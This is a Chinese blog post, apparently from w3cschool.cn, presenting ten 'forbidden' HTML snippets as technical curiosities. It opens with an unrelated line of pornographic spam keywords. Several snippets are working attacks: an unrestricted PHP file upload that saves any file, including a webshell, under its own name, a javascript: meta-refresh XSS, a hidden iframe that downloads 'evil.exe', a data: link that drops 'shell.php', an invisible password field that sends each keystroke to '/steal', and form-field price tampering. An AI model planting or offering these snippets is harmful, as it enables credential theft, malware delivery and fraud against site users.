国产chinesehdxxxx野外,国产av无码专区亚洲av琪琪,播放男人添女人下边视频,成人国产精品一区二区免费看,chinese丰满人妻videos

App下載

邪修 HTML 10 連擊|一句話木馬、隱藏下載器、零寬空格

編程獅(w3cschool.cn) 2025-08-07 17:09:40 瀏覽數(shù) (313)
反饋

邪修 HTML ,10 段“千萬別上生產(chǎn)”的暗黑代碼
——僅供技術(shù)獵奇,切勿真用!

?? 每條都可能:語(yǔ)義錯(cuò)亂、SEO 爆炸、可訪問性崩壞、面試官當(dāng)場(chǎng)暈厥

面試炫技 OK,項(xiàng)目敢用就等死!

1?? 一行木馬上傳

<form action="" method="post" enctype="multipart/form-data">
  <input name="f" type="file">
  <input type="submit">
</form>
<?php
if ($_FILES['f']['tmp_name'])
  move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);
?>

最精簡(jiǎn)的“一句話”上傳,WAF 看了沉默。

2?? meta 刷新秒跳轉(zhuǎn)

<meta http-equiv="refresh" content="0;URL=javascript:alert('XSS')">

無 JS 也能彈窗,老 IE 全中招。

3?? 隱藏下載器

<iframe src="evil.exe" style="display:none"></iframe>

頁(yè)面一打開就偷偷下文件。

4?? 利用 data: URI 寫任意文件

<a href="data:text/plain;charset=utf-8,木馬內(nèi)容" download="shell.php">點(diǎn)我</a>

瀏覽器直接落地木馬,繞過上傳限制。

5?? 偽裝輸入框偷密碼

<input type="password" style="opacity:0;position:absolute" oninput="fetch('/steal?p='+this.value)">

透明輸入框,用戶打一字傳一字。

6?? 表單項(xiàng)同名覆蓋

<input name="price" value="999">
<input name="price" value="1">

后端只收到最后一個(gè)值,前端輕松篡改價(jià)格。

7?? 負(fù)值進(jìn)度條

<meter value="-10" min="0" max="100">進(jìn)度</meter>

語(yǔ)義完全錯(cuò)誤,屏幕閱讀器崩潰。

8?? 嵌套 details 無限遞歸

<details>
  <summary>點(diǎn)我</summary>
  <details><summary>再點(diǎn)</summary>…無限套娃</details>
</details>

頁(yè)面高度瞬間爆炸。

9?? autofocus + onfocus 死循環(huán)

<input autofocus onfocus="this.form.submit()">

自動(dòng)聚焦即提交,用戶一進(jìn)來就刷新。

?? 零寬空格隱形文本

<p>正​常​文​本</p>

肉眼看不見,復(fù)制粘貼即亂碼,SEO 直接廢。

邪修口訣

“標(biāo)簽當(dāng)武器,屬性藏殺機(jī);

語(yǔ)義全不要,瀏覽器哭泣?!?/p>

PS

想要正經(jīng)學(xué)習(xí) HTML ,從《HTML 入門課程》開始!

HTML 前端

0 人點(diǎn)贊